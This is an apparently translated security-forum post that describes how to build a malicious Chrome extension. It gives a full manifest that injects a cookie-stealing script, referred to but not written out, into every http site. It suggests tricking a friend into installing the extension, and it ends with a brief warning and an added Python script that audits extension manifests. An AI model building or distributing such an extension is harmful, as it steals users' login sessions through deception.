I have dug up a bunch of XSS in the past. At first I thought it was quite interesting. Later I realized that I would submit the XSS in the future. Sorry, brother, I don't know what type this should be, you can check it out... This is just something that I came up with when I was bored. I don't know if I can pass it...
Chrome plug-in development: running a malicious Chrome plug-in to hijack the entire browser. For every website the user logs in to through the Chrome browser, the cookies are sent automatically.

Before getting started, let's cover the basics of Chrome plug-in development. Several files are required to develop a Chrome plug-in. The main file is manifest.json (similar to a configuration file). The manifest used this time is:

    {
      "name": "ThE WorLd",                 // name
      "version": "1.0",                    // version
      "manifest_version": 2,               // required
      "icons": {"128": "smile.gif"},       // icon
      "content_scripts": [                 // sets the communication between the javascript and the website
        {
          "matches": ["http://*/*"],       // sites the plug-in js communicates with; http://*/* means any website
          "js": ["location.js"]            // malicious js script
        }
      ],
      "description": "TEST",               // description (remarks)
      "browser_action": {                  // icon
        "default_icon": {"19": "icon.gif", "38": "smile.gif"},
        "default_title": "ThE WorLd",
        "default_popup": "popup.html"      // pop-up window
      }
    }

content_scripts is the key option: it sets which websites the javascript communicates with. Here we set it to any URL; if you just want to steal the cookie of a single site such as Weibo, you only need to set http://t.qq.com/*. That's all. We will use the xsser.me js script later.

For a better effect, popup.html should be polished, but I will not do that here. I will not beautify it... Two simple statements. <H2> WOOYUN

The crx below is then passed to others with a line like "buddy, brother found a penetration artifact...", and then it is GAME OVER.

Solution:
Be careful with this kind of thing...
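One way to act on that advice before installing an extension handed over by someone else is to read its manifest and list where its content scripts run. The script below is an added example, not part of the original post; the names strip_line_comments, audit_manifest and ALL_SITES are hypothetical, and the sample input is constructed from the manifest shown above.

```python
import json

# Match patterns that inject a content script into every page of a scheme.
ALL_SITES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

def strip_line_comments(text):
    """Drop // comments, but not the // inside strings such as "http://*/*"."""
    out, in_str, i = [], False, 0
    while i < len(text):
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < len(text):  # keep escaped character as-is
                i += 1
                out.append(text[i])
            elif c == '"':
                in_str = False
        elif text.startswith("//", i):
            while i < len(text) and text[i] != "\n":
                i += 1
            continue  # the newline itself is handled on the next pass
        else:
            in_str = c == '"'
            out.append(c)
        i += 1
    return "".join(out)

def audit_manifest(text):
    """Return (pattern, scripts, runs_on_all_sites) for every content-script match."""
    manifest = json.loads(strip_line_comments(text))
    findings = []
    for entry in manifest.get("content_scripts", []):
        for pattern in entry.get("matches", []):
            findings.append((pattern, entry.get("js", []), pattern in ALL_SITES))
    return findings

# Constructed input: the relevant part of the manifest shown on this page.
SAMPLE = """{
  "name": "ThE WorLd", // name
  "manifest_version": 2,
  "content_scripts": [
    {"matches": ["http://*/*"], // any website
     "js": ["location.js"]}
  ]
}"""

if __name__ == "__main__":
    for pattern, scripts, everywhere in audit_manifest(SAMPLE):
        print("ALL SITES" if everywhere else "scoped", pattern, scripts)
```

A pattern reported as scoped still deserves a look when it names a site you log in to, since the listed scripts run inside that site's pages.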